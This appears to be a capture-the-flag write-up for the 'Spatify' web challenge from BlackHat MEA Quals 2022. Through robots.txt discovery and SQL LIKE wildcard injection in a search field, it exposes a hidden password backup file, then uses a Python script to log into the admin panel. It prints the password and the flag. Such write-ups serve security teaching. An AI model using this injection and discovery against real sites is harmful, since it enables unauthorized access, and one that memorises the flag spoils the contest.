Diefunction
Search
K

Spatify

Difficulty

Easy

Points

150

Description

Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!

Quick Analysis

Spatify robots.txt file discovery

After running the Burpsuite crawler, or any crawler, the crawler discovered a /robots.txt file.

What is a robots.txt file used for? [1]

The robots.txt file tells search engine crawlers which URLs the crawler can access on your site.

Content of robots.txt

from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
file = '/robots.txt'
response = get(url + file)
print(response.text)
User-agent: *
Disallow: /superhiddenadminpanel/

Spatify's admin panel

The Spatify admin panel /superhiddenadminpanel/ can only be access via a password.

Spatify search engine

The Spatify home page / search for music based on the music name. Default listed music
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>

Analyze the search SQL Query

The search requires input with at least five characters. The common word between all three music names is FEATURED. The result of FEATURED search is the same as the home page default music. I assume the SQL Query querying is based on LIKE operator.

The SQL LIKE Operator [2]

The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.
There are two wildcards often used in conjunction with the LIKE operator:
  • The percent sign (%) represents zero, one, or multiple characters
  • The underscore sign (_) represents one, single character

LIKE syntax

SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern;

Spotify Search with SQL Wildcards

The result of FEATURE% search is the same as the home page default music, which means the query is injectable with SQL wildcards.

Exploitation

SQL wildcard injection

List all music records with wildcards with five percent signs %. q=%%%%%%
<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>

Content of secret_password_backup.txt.bak

file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
THISISTHEPASSWORDTOTHEADMINPANEL123321123321

The flag

import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}

References

  • https://developers.google.com/search/docs/crawling-indexing/robots/intro
  • https://www.w3schools.com/sql/sql_like.asp
CTF - Previous
BlackHatMEA Quals 2022
Next
PeehPee
Last modified 1yr ago